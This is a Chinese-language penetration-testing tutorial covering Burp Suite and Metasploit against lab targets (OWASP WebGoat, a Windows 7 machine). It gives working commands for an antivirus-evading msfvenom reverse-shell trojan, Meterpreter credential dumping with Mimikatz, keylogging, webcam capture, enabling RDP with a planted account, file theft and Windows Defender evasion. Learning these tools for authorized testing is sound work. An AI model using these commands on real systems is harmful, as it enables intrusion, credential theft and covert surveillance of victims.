渗透测试_漏洞利用

Burp Suite

KaLi 启动 Burp Suite





配置代理


Interceept on/off 是否拦截HTTP流量
Forward 会将流量转发到请求地址
Drop 会将请求流量丢弃
Open Browser 会将请求流量通过浏览器打开


证书下载

方式一:导出功能下载





方式二:网页下载


FireFox浏览器 配置代理及证书







重启BurpSuite,需浏览器重启配置证书

BurpSuite 开启 Intercept on拦截功能,浏览器访问 www.baidu.com 进行测试效果

实例:构造异常请求,绕过身份验证,登录界面

浏览器访问 OWASP WebGoat 靶机

只输入用户名(webgoat)进行登录,可以看到网页是无效登录

构造请求包,将请求变成一场请求从而绕过验证登录

开启拦截功能

再次在OWASP WebGoat界面只填写用户名进行登录

可以在BurpSuite中看到用户名、密码、登录的拦截信息

删除选中的Password字段内容,单击 Forward 将请求转发到请求地址

成功构造出的异常请求将登录验证终端,从而成功绕过身份验证,直接登录到用户界面

Metasploit 渗透测试框架

  • Metasploit 是一个开源的渗透测试框架,由Rapid7公司和社区共同开发、维护
  • 它是世界上使用最广泛的渗透测试工具,可以帮助安全团队发现和利用系统漏洞、管理安全评估、提高安全意识
  • Metasploit框架是由 Ruby语言编写,其各个目录作用如下

/usr/share/metasploit-framework/

msfconsole 进入Metasploit 终端模式

shell 复制代码
msfconsole

msfvenom 查找所有可用的Payload

payload 指的是恶意代码中‌实际执行破坏性操作‌的核心部分

shell 复制代码
msfvenom -l payloads


显示仅支持Windows系统的Payload

shell 复制代码
msfvenom -l payloads | grep windows


msfvenom 查看可以使用的编码

通过编码方式可以使Payload带有绕过杀毒软件的效果

shell 复制代码
msfvenom -l encoders  


msfvenom生成木马文件

shell 复制代码
msfvenom -p windows/meterpreter/reverse_tcp -e x86/shikata_ga_nai -i 5 LHOST=192.168.2.23 LPORT=4444 -f exe > /root/muma.exe
-p 使用的payload
-e 使用的编码方式
-i 编码次数
LHOST 本机IP地址
LPORT 本机端口
-f 保存的文件格式
> 保存路径
-x 将payload附加到应用上 从而使应用在运行后也运行木马

利用木马文件开启目标系统远程桌面

use exploit/multi/handler 开启监听模块

set payload xxxx 修改payload

set payload windows/meterpreter/reverse_tcp

修改生成木马文件使用的payload,以监听该模块产生的会话请求

show options 查看模块配置

Required 列为 "YES"值的配置是必须设置的选项

set lhost xxxxx 修改本地IP
exploit 运行模块配置

在目标机 Windows7上运行木马文件,并返回KaLi Linux 查看监听
木马文件可通过各种手段传到目标系统内

可以看到监听成功,并且Metasploit 与目标主机之间建立 Meterpreter 会话

会话调优
shell 复制代码
set SessionCommunicationTimeout 0
set SessionExpirationTimeout 0

一个会话在5分钟之内没有做任何事情,将会被杀死,而将SessionCommunicationTimeout值修改为0可以避免这种情况

会话也会在一周后会被强制关闭,将SessionExpirationTimeout值修改为0将永不关闭

meterpreter会话(session)

Metasploit 与 目标主机建立的会话 为 Meterpreter

background

当前的Meterpreter会话,放到后台

sessions 切换指定会话
sessions -l

查看当下已激活的会话

ls

当前会话窗口下,模块运行情况

sysinfo

获取目标系统信息

ipconfig

获取目标的IP地址信息

getuid

获取目标主机的UID

getsystem 提升权限

如果不是系统权限或者管理员权限,使用该命令提升权限

use -l

查看Meterpreter会话所有可用的扩展插件

use 扩展插件 加载扩展插件

加载使用扩展插件

help

帮助菜单,如果加载了扩展插件,也会显示扩展插件的命令帮助

list_tokens -u

在加载了 incognito 插件前提下,使用该命令查看目标用户的Token

lsa_dump_sam

在加载了 Mimikatz 插件前提下,使用该命令 会转存储SAM库的内容

lsa_dump_secrets

在加载了 Mimikatz 插件前提下,使用该命令 会转存储LSA信息并解密

use post/windows/manage/enable_rdp 创建远程桌面的用户名和密码

shell 复制代码
show options
set password hello
set username hello
set session 1    //该会话号需与 Melasploit与目标主机建立的Meterpreter的session号一致
exploit

rdesktop IP地址 远程桌面命令


如果 rdesktop 尝试连接,但无法连接时


netstat 查看目标主机是否开放3389端口

shell 获取目标系统的交互式shell,在交互式shell下输入如下命令:

shell 复制代码
REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server /v fDenyTSConnections /t REG_DWORD /d 00000000 /f

利用木马文件上传、下载目标系统文件

利用上文中的木马,通过Metasploit 与 目标主机建立 Meterpreter会话

download下载

将目标机的文件下载到攻击机系统中

目标主机当前工作目录文件加载
shell 复制代码
download user_info.txt /home/mikowoo/tmp/
指定目录地址文件下载
shell 复制代码
download C:\\Users\\mikowoo\\Desktop\\user_info_desk.txt /home/mikowoo/tmp/

upload上传

将文件上传到目标主机当前工作目录下
shell 复制代码
upload /home/mikowoo/tmp/kali_info.txt 


将文件上传到目标主机指定目录下
shell 复制代码
upload /home/mikowoo/tmp/kali_info.txt C:\\Users\\mikowoo\\Desktop

cat 查看文件

查看目标主机当前工作目录的文件内容
shell 复制代码
cat user_info.txt 
查看目标主机指定路径文件内容
shell 复制代码
cat C:\\Users\\mikowoo\\Desktop\\user_info_desk.txt 

edit 编辑目标主机的文件



目标主机已有的文件内容被替换,文本被编辑成攻击者写入的文件内容

execute 目标主机上执行程序

在目标主机上执行程序

以打开记事本程序为例

shell 复制代码
execute -f notepad.exe
在目标主机上隐藏进程执行应用程序

以打开记事本程序为例

shell 复制代码
execute -H -f notepad.exe


在目标主机上隐藏进程执行应用程序进行进行交互
shell 复制代码
execute -H -i -f cmd.exe

记录目标主机键盘录入内容

keyscan_start 开启键盘记录
keyscan_dump 键盘记录的内容查看


keyscan_stop 停止键盘记录

利用目标主机摄像头拍照

shell 复制代码
webcam_list				//目标主机当前摄像头
webcam_snap 摄像头ID    //通过目标主机摄像头拍照

目前作为测试的目标主机不具备摄像头,该命令未测试,回头找电脑测试

扫描并利用目标主机漏洞



生成绕过防火墙的木马文件

show evasion 查看外部所有模块的免杀规避模块

shell 复制代码
use evasion/windows/windows_defender_exe
set payload windows/meterpreter/reverse_tcp
show options
set lhost 192.168.2.23 //本机IP
run


相关推荐
啥都想学点2 小时前
pikachu靶场——Cross-Site Scripting-1(Kali系统)
网络安全
F1FJJ3 小时前
基于网络隐身的内网穿透
网络协议·网络安全·go
苏天夏3 小时前
Passport 插件:Typecho 密码安全的技术守护者
安全·网络安全·php
Lust Dusk4 小时前
CTFHUB靶场 HTTP协议——302跳转
web安全·网络安全
落寞的魚丶4 小时前
2025-2026学年广东省职业院校学生专业技能大赛信息安全管理与评估赛项技能测试试卷(一)一阶段解析
网络安全·应急响应·鱼影安全·2026广东技能大赛·信息安全评估赛道
以太浮标13 小时前
华为eNSP综合实验之- 3a认证配置案例及解析(AAA认证)
运维·tcp/ip·网络安全·华为·信息与通信
枷锁—sha17 小时前
【CTFshow-pwn系列】03_栈溢出【pwn 053】详解:逐字节爆破!手写 Canary 的终极破解
网络·笔记·安全·网络安全
零零信安21 小时前
法国某 WordPress 电商平台管理员权限遭拍卖
网络安全·数据泄露
Lust Dusk1 天前
CTFHUB靶场HTTP协议——响应包源代码
web安全·网络安全